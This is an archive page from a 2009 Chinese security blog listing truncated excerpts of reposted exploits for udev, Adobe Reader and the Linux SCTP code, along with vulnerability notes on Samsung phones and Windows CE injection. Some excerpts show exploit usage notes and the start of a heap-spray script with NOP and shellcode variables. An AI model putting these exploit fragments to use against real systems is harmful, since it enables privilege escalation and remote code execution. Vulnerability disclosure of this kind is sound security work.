浏览模式: 标准 | 列表2009年04月的文章

[置顶] Windows Mobile 开发工具和资源下载

Submitted by Akira on 2009, April 18, 3:38 PM

发现经常有朋友想学习 Windows Mobile 开发,体验移动开发的乐趣,但不知道从哪里下载各种开发工具和学习资料。于是我整理了一个列表,里面包含了各个版本的 Windows Mobile SDK, .NET Compact Framework, SQL Server CE, Device Emulator, Emulator Image 和学习资料的下载链接

 

» 阅读全文

Tags: windows moblie, 智能手机

手机安全 | 评论:1 | Trackbacks:0 | 阅读:608

Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit

Submitted by Akira on 2009, April 30, 11:57 PM

 *   An alternate version of kcope's exploit.  This exploit leverages the
 *   95-udev-late.rules functionality that is meant to run arbitrary commands
 *   when a device is removed.  A bit cleaner and reliable as long as your
 *   distro ships that rule file.  The exploit will execute /tmp/run as root
 *   so throw whatever payload you want in there.
 *
 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
 *   usually is the udevd PID minus 1) as argv[1].

» 阅读全文

Tags: linux, exploit, 漏洞

漏洞信息 | 评论:0 | Trackbacks:0 | 阅读:178

Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit

Submitted by Akira on 2009, April 30, 11:54 PM

//##############
//Exploit made by Arr1val
//Proved in adobe 9.1 and adobe 8.1.4 on linux
//
//Steps:
//- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted)
//- attach the following script to the OpenAction of the pdf.

» 阅读全文

Tags: adobe, exoloit, execution

漏洞信息 | 评论:0 | Trackbacks:0 | 阅读:192

Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit

Submitted by Akira on 2009, April 30, 11:51 PM

//##############
//Exploit made by Arr1val
//Proved in adobe 9.1 and adobe 8.1.4 on linux
//##############

var memory;
function New_Script()
{
    var nop = unescape("%u9090%u9090");
var shellcode =

» 阅读全文

Tags: adobe, exoloit, execution

漏洞信息 | 评论:0 | Trackbacks:0 | 阅读:198

三星M8800 Innov8和SGH-J750手机SMS Provisioning消息绕过认证漏洞

Submitted by Akira on 2009, April 29, 12:52 PM

M8800 Innov8和SGH-J750手机没有向用户显示provisioning消息的来源;接受了消息体中不存在SEC和MAC参数的未经认证SMS Provisioning消息;即使接受了消息体中存在SEC和MAC参数的已认证SMS Provisioning消息,也没有对参数执安全检查。如果远程攻击者发送了上述类型的provisioning消息的话,就可能扮演为合法的来源,诱骗用户安装恶意配置。

» 阅读全文

Tags: anycall, 三星

手机安全 | 评论:0 | Trackbacks:0 | 阅读:196

Linux Kernel 2.6.x SCTP FWD Memory Corruption Remote Exploit

Submitted by Akira on 2009, April 29, 11:58 AM

/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption
 * Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
 *
 * coded by: sgrakkyu <at> antifork.org
 * http://kernelbof.blogspot.com
 *
 *
 * NOTE: you need at least one sctp application bound on the target box
 *
 * Supported target:
 * Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server)
 * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
 * Ubuntu 8.10 x86_64 (2.6.27_7-10 geenric/server)
 * Fedora Core 10 x86_64 (default installed kernel)
 * OpenSuse 11.1 x86_64  (default installed kernel)

» 阅读全文

Tags: exploit, linux, 最新漏洞

漏洞信息 | 评论:0 | Trackbacks:0 | 阅读:166

war3 最新漏洞

Submitted by Akira on 2009, April 28, 11:25 PM

So, does anyone know enough about jass byte code to answer this question:
What's on average the size a map's compiled bytecode takes? - This is very important to know for me...

» 阅读全文

Tags: war3, 漏洞

漏洞信息 | 评论:0 | Trackbacks:0 | 阅读:274

Windows CE跨进程内存注入之原理

Submitted by Akira on 2009, April 27, 3:18 PM

CE的内存布局中划分有一个slot0的内存位置,这个内存位置是由正在执行的进程所占有的,每一个特定的时间片,只能有一个进程可以占有这个内存空间。 在进程要求执行时,系统并不直接执行进程所处内存位置的代码,而是将该进程的执行代码复制到slot0的内存位置中产生一个副本执行。也就是说进程在执行 时内存将会有进程执行代码的两个完全一样的版本:存在于slot0中正在执行的进程代码和进程本身所处的内存中的代码

» 阅读全文

Tags: windows ce, 注入

技术文档 | 评论:1 | Trackbacks:0 | 阅读:298

Records:23123